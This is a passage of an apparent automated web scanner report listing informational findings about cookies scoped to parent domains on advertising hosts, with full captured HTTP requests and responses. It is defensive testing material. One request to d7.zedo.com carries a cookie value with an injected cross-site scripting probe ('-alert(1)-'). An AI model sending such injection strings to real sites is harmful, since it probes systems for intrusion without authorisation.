GET /bar/v16-504/d2/jsc/gl.js?k5xiThcyanucBq9IXvhSGSz5~090311 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d2.zedo.com/jsc/d2/ff2.html?n=767;c=33/1;d=40;w=728;h=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFgeo=5386156; FFMCap=2457900B1185,234056:933,196008|0,1#0,24:0,1#0,24; aps=2; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFad=0:1:0:0:0:0:0:0:0:0; FFcat=767,4,94:933,56,15:826,471,9:767,4,9:767,4,41:1302,202,9:826,471,14:767,4,14:1185,589,14:305,825,15; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Mon, 03 Sep 2012 02:44:05 GMT;domain=.zedo.com;path=/;
ETag: "9e267a-5d7-4aa4dd4309500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=326565
Expires: Wed, 07 Sep 2011 21:26:50 GMT
Date: Sun, 04 Sep 2011 02:44:05 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

15.53. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/d3/jsc/gl.js?k5xiThcyanucBq9IXvhSGSz5~090311 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=202;s=32;d=9;w=300;h=250;l=[INSERT_CLICK_TRACKER_MACRO]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFad=0:0:0:0; FFcat=826,471,14:767,4,14:1185,589,14:305,825,15

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Mon, 03 Sep 2012 02:38:59 GMT;domain=.zedo.com;path=/;
ETag: "436874d-5d7-4aa4ddaecd340"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=326850
Expires: Wed, 07 Sep 2011 21:26:29 GMT
Date: Sun, 04 Sep 2011 02:38:59 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

15.54. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d8/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=&$=&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2457900B1185,234056,234851:933,196008|1,1#0,24:0,1#0,24:0,1#0,24;expires=Tue, 04 Oct 2011 02:31:37 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1185,589,14:767,33,40:767,4,94:826,471,9:767,4,9:767,4,41:826,471,14:767,4,14:1185,833,14:933,56,15:1302,202,9:305,825,15;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:1:1:1:1:1:1:1:0:1:0:0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=181
Expires: Sun, 04 Sep 2011 02:34:38 GMT
Date: Sun, 04 Sep 2011 02:31:37 GMT
Content-Length: 3656
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=76;var zzPat='';var zzC
...[SNIP]...

15.55. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=1585&s=1&l=1&t=e&e=1 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?bCIAAMFGJAAqmW0AAAAAAD8wHAAAAAAAAgAAAPgAAAAAAP8AAAAHFqpSJQAAAAAArFIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAntA8AAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACC2GFqq8irCgocRgCPmDSPtBCJwbVKyI.-i0CdAAAAAA==,,http%3A%2F%2Fd3.zedo.com%2Fjsc%2Fd3%2Fff2.html%3Fn%3D933%3Bc%3D56%3Bs%3D1%3Bd%3D15%3Bw%3D1%3Bh%3D1%3Bq%3D767,B%3D12%26Z%3D1x1%26_salt%3D1921477770%26m%3D2%26r%3D0%26s%3D2377409,b0792572-d69e-11e0-98f4-78e7d1f5c9bc
Cookie: FFgeo=5386156; ZFFBbh=977B826,20|633_962#7Z695_955#5Z332_950#4; ZEDOIDA=mLs5ThcyantsGCRD8ld6EMRU~080311; ZFFAbh=946B826,20|332_950#369Z695_955#374Z633_962#381; FFAbh=950B809,20|10_1#365Z3_1#392:305,20|145_2#371Z458_1#371; FFBbh=962B809,20|10_1#0Z3_1#15:305,20|145_2#3Z458_1#0; ZEDOIDX=5; FFpb=305:609c0'-alert(1)-'ce33e99e75d,1726d%27%3b9f644ea3489,1726d'; FFcat=933,56,15:826,471,14:767,4,14:305,825,15:305,825,0:0,825,15:305,0,15:0,0,0; FFad=0:0:0:47:1:1:0:1; aps=1; FFMCap=2457960B933,196008|0,1#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 47
Content-Type: image/gif
Set-Cookie: ZFFAbh=946B826,20|633_962#381Z695_955#374Z332_950#369;expires=Sat, 03 Dec 2011 02:36:28 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=977B826,20|633_962#7Z695_955#5Z332_950#4;expires=Mon, 03 Sep 2012 02:36:28 GMT;domain=.zedo.com;path=/;
ETag: "3a9d58c-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6938
Expires: Sun, 04 Sep 2011 04:32:06 GMT
Date: Sun, 04 Sep 2011 02:36:28 GMT
Connection: close

GIF89a.............!.......,...........D..;



15.56. http://d7.zedo.com/utils/ecSet.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h1197692Za1015462Zc1185000589%2C1185000589Zs76Zt1246Zm1286Zb43199&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; FFcat=1185,589,14:305,825,15; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199;expires=Tue, 04 Oct 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=4100
Date: Sun, 04 Sep 2011 02:31:51 GMT
Connection: close



15.57. http://developers.facebook.com/plugins/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /plugins/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: /docs/plugins
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.48.116
Connection: close
Date: Sun, 04 Sep 2011 04:14:55 GMT
Content-Length: 0


15.58. http://dis.sv.us.criteo.com/dis/dis.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dis.sv.us.criteo.com
Path:   /dis/dis.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dis/dis.aspx?pu=1174&cb=eefb80330c HTTP/1.1
Host: dis.sv.us.criteo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cas.criteo.com/delivery/afr.php?zoneid=2873&ct0=http://yads.zedo.com/ads2/c?a=680391%3Bn=826%3Bx=2309%3Bc=826000471,826000471%3Bg=172%3Bi=0%3B1=99%3B2=1%3Bs=318%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=mLs5ThcyantsGCRD8ld6EMRU~080311%3Bsn=767%3Bsc=0%3Bss=0%3Bsi=0%3Bse=1%3Bp=8%3Bf=842351%3Bh=842216%3Bo=20%3By=305%3Bv=1%3Bt=r%3Bl=1%3Bs%3D318%3Bu%3DmLs5ThcyantsGCRD8ld6EMRU%7E080311%3Bz%3D0.4584487103923105%3B3%3Dz4-633%3Bk%3D
Cookie: uid=6731d4ad-7dae-4402-b507-a0bc233d79fb; udc=*1LgqBSlkhFCwXQKH6%2bJeAE3uNMVhXL0Ng%2bdKsouT8MQasnIZS58bp7m9v9Qve5MeE; uic=*1pOlwoshvAW2x3Oz%2bjok0cvVUTldU9thEXDVJHERJCsS8Qa8h95CnNUGIZvfT3E7MxvviQAdwbClCyEye0669isBI09H1R%2bKRO%2fltWpPRjN8%3d; evt=*1y97%2bNEPoN61o4EOCN%2fR2J9xVlHZMgVk%2b%2b2CwFGGZfIU%3d; dis=*1qWp1fsD%2bNdFnAtZ8%2baXsozp2l%2bVc4bwCpvGo36v6yzYl0vr%2b2rjd5s8HTnWLQ9vMdXMCedmlDMU1pVu7re3OqNSH03%2b%2fM819k1%2fHITjOJ99Qw4xwyEiIgha04DWLoK6z%2ftKYTIM%2bWvQpq6GH7Cf6THfb8s6N7d8wMlE1BAjK%2bDHApUIrLHRIWZaa1LvF56sc8LiTQybietPPncAzstNhBe%2baDkL8RY%2bTFbyxwc4wWOtAD8BXpV3Cz%2fiiH%2bVSWcx0rMIjfsHkOqahM925DOtINv%2b5GBrED6nMhkSLKihoDycCzgwK0V924PtbaS64eEp7pATGcjXGxFLRtaKsTJllUarZKLj%2blLzkQoSSdQl2IgEDKA2%2fEGzXqNG5Iw%2fnmBmo6CrXMAegC0CK3gdYN%2b9DnZN2Cfy1%2b4%2blkWJ4jnK5p6TQ36wYJrd9vjipwogdRUCTqKEM3BvjqUQfJ0nea7i6vfabzsxKam14f%2fi5q8J2VF2V6DewZNzR%2f5365qR2sDhJWkbOphSWIYmULMBJPmZneFkaco3LrTUxUAqI3%2brS7h8bDHumnJE%2fp2b6uo%2b9XJRy%2fhw%2bC7HcUnCJHPYM0Scri9FFUNs5fbiASA4wjgT53CRkUy0COj5OZSzb96RLeBPIAU8O5IHm0fDHfL3qnOXeEY19u0QsnKNz0kXGI9w9M0Q%3d; udi=*1HptB%2fqzMXoFPX0j%2bzbV2Wg%3d%3d

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Date: Sun, 04 Sep 2011 03:57:31 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: udc=*1D84iREYveIcXTcUuV3G%2bWDI3oCPaaCq4ndvKiJdEQzL3HrGkWUPZvuc4D6KQzQ1X7mjEMA8%2behgOrXEaUTAmJwZohOH7%2fNLtIEuwhFZ8rik5cOZ3UPIOIbjX6FJbxsypIvb%2bgchEY6hOJqxRDF3XEok6NhldfB9UFRA96oIbx68rDrtWSOw1MKueiqCLHUhqKLNXdoPmtaV5oepHfyOdKMgNfzF9eefiCY%2bWuEsAFmEP1ydZXUr4J1srIBp6e%2f0RDCuwh3sbQd94jlqA88sNESQP5l5PlwTlOfstA%2bp9SojknO3iekUzOUXFevnhUNNsxvDUlTvPaxWrfB%2bkaOkFtfwEiZuwSsg7IX7cekpWvIMF53InyMlM9x2Ki0rxukTCXQShXT3Kzxt60rKBKEM0TyZkv81sH4%2f%2bV%2fjLSEzLvjVO1troWdAkr8ssIIXZsJftbP9SR3eNgPk504U9HMyRSqDvgrkRpwHjMQNMura8aZGy1qewlUbiFahQJsAhepTihNXfQSdOG4X6L8F2cXxODJHDxABznU1t0tKMq2cV%2fMPJaZr8oiEFmnFIF5hZrW2nLJkI6EqOo6S9FgGjI09tDvw4%2bzjK15FIekjB8%2fMIOBlsj5YvQ%2bwPdu97DlJLAPagpqj0EOuJxgtq%2fYa6UiCNUsQatfDK%2fPuxb9cmfbe7U8K01SbrfB1YqmFmXbeNkH6%2bYrdGcbSU%2fDVersSXUDtbZQv3DwSRq1o1JdbSBwoNAfze73GYR9joMNQBO%2fq9JzpPjVwTrz2KYtsP8eKJkadbkkijrA2JSFHSa2c72YbJloiIwyzryY7KGfWUPq6amKsR7%2fqV%2fKi9qfByYHmqU6HMu0C%2bxYz0qTVwK5xKtHgp%2frRLQZ5kVcpG0I9GuOBhMzdwj9nwbt%2bTiPqVXFLCS%2bHErQXQE4%2biEsP84XdmQaM%2bOo210FzRwEQBUS2dlJPSE0nHHJ1RZTR%2fUyl5Q7fVfVYBEkBEIiZH%2f7WnCyhatTIyfsYt4cjh5BR8cAfEtzDzYVzuftvBzwWlOI1ulZ9EmIS%2b4A%3d%3d; domain=.criteo.com; expires=Sun, 04-Mar-2012 04:57:31 GMT; path=/
Set-Cookie: dis=*1HdUHehLKopaii0g3LYHPnEdKM%2fxGkB7DQd01XOoeL1sZkEkz3zjh83XQpRJS3%2biCXCkH72HFonZPUaaWLVka5JVI8gNrqvAiJlhOuC13oU83XiV%2fQkBM%2fxfJWxbBwlURgN1HOIDrOkuhuis13QWJrziPNSrREWHlUq%2buCoAr1JZol2clNwQIOTigVqiU0oKkssZnH3oUKz3jIuTk4VAysJicp07wx9GHCc6feOzTy6E7d%2b19geUV%2fNt0WY2agQ%2bMW%2b0BftWgiAXIjgfQj7UUxr2MHsLbU1x4USCW2HPoecK4M9Ye%2b%2ffPAHsOZCX9F4lgUelxWAVmQZUb58fFz20q8Ecm4qKZR4rQ%2fWNTiM3YDyemoxgbtL%2b7aH2kiDBK5qsXBH2isVSHhg%2b%2fmeS7R%2fWcCg4TA7HNCH%2bsOIUnxGvRrdhEq3ZOCsVINKQs9IZ8IPuXh5Siy%2fYRhrFjM6R1ITVFoCIZKLetDEPaLIpnuh2bbhoENj6erMGWFULA5RkCxyYRPiAqFTUA4vwIMS%2fmal%2bRv%2bjiKDwEe%2fyJ7JHcJ%2fMuhO%2bXDneOjdJCrEAgdi0TV%2bZFEdpmtU61aSZqsovJjzsrxSuTnawtngARYbiPakMn60QynqbBZ0iVa16v1XheEDXHgWX%2bjIhYUrOZ1ofTsNpj1OmhIEg%2fTLummfVKc1d3V4yA4SloIuLBMvRxLHYsmoBtGIS67TLObKNb8jcDr7HiqPAf6ocNwCuIofPqFj3RCPtyDbIDR37gYywH0VnVlXW68gmssHsPDh1sAHpGSxFxZRtiFTm7hIGEnfkObg4ev78%3d; domain=.criteo.com; expires=Sun, 04-Mar-2012 04:57:31 GMT; path=/
Set-Cookie: udi=*1KFVyONyyk%2b29tPxKymJDiw%3d%3d; domain=.criteo.com; expires=Mon, 05-Sep-2011 03:57:31 GMT; path=/
Content-Length: 4874

<html>
<head>
<title>Dising</title>
<script type="text/javascript">
function edcTimeout(){}
function write_edc(){}
function initEdc(){}
function cto_AI(u,n,r){var cto_ifr=document.getElementByI
...[SNIP]...

15.59. http://dp.33across.com/ps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dp.33across.com
Path:   /ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=533 HTTP/1.1
Host: dp.33across.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=767
Cookie: 33x_ps=u%3D8746800456%3As1%3D1312556891392%3Ats%3D1315103782954%3As2.33%3D%2C6940%2C

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 02:36:31 GMT
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_ps=u%3D8746800456%3As1%3D1312556891392%3Ats%3D1315103782954%3As2.33%3D%2C6940%2C; Domain=.33across.com; Expires=Mon, 03-Sep-2012 02:36:31 GMT; Path=/
Location: http://ib.adnxs.com/mapuid?t=2&member=1001&user=8746800456&seg_code=33x,6940&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Ft%3D2%26adv%3D307445%26code%3D6940&random=613497
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


15.60. http://i.w55c.net/ping_match.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /ping_match.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?ei=RUBICON&rurl=http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4210%26nid%3D1523%26put%3D_wfivefivec_%26expires%3D10 HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=4642/5271
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; matchadmeld=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 02:40:24 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Tue, 03-Sep-13 02:40:24 GMT
Cache-Control: private
Content-Length: 0
Location: http://pixel.rubiconproject.com/tap.php?v=4210&nid=1523&put=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F&expires=10
X-Version: DataXu Pixel Tracker v3
Via: 1.1 dfw175165010000 (MII-APC/2.1)
Content-Type: text/plain


15.61. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ab?enc=AAAAAAAAEEApXI_C9SgMQAAAAAAAAPg_KVyPwvUoDEAAAAAAAAAQQIcXbYK40jx0cEeI8W8QIlk54mJOAAAAALdLAABlAQAA2AMAAAIAAACjbggAPWQAAAEAAABVU0QAVVNEANgCWgAPHBcC3Q4BAgUCAQQAAAAAXBljhQAAAAA.&tt_code=vert-29&udj=uf%28%27a%27%2C+22407%2C+1315103289%29%3Buf%28%27c%27%2C+133618%2C+1315103289%29%3Buf%28%27r%27%2C+552611%2C+1315103289%29%3Bppv%2815706%2C+%278375801096906282887%27%2C+1315103289%2C+1315362489%2C+133618%2C+25661%29%3B&cnd=!1xYx6wjykwgQo90hGAAgvcgBMAA4jzhAAEjYB1AAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBArABALkBAAAAAAAAEEDBAQAAAAAAABBAyQEzMzMzMzP3P9kBAAAAAAAA8D_gAQA.&ccd=!BQXSKQjykwgQo90hGL3IASAA&referrer=http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917&media_subtypes=1&pp=AAABMjJDsl8k6iYL9tmoP8L7nDlZjEhOctPlYA&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ3DMAwF0O9cEOA13BIgLYqSiqyQHXQCKTOBx3SfSYK8_q1YAGxjiIqESbanRNp2ozS9kY0QA3senqvD5VW_ecX1PziMUjxnMu1KjUuk7jVTbVKlW-oSp8MNiE-HO5bzcHgAnzd-lT2113MAAAA%3D%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZVGg1td>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3JWdNI6Q!=v6WStTMc; sess=1; uuid2=6422714091563403120

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 03:28:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Sat, 03-Dec-2011 03:28:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu98Ep.Iujc'q65.6Q(PBE9e8LZu$k9hL'>@)z!2W$t+ztxA; path=/; expires=Sat, 03-Dec-2011 03:28:46 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 04 Sep 2011 03:28:46 GMT
Content-Length: 998

document.write('<scr' + 'ipt language=\'javascript\' type=\'text/javascript\' src=\'http://imp.fetchback.com/serve/fb/adtag.js?clicktrack=http://ib.adnxs.com/click%3FQZ4S5ClBA0CLbOf7qfEAQAAAAAAAAPg_KV
...[SNIP]...

15.62. http://ib.adnxs.com/getuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

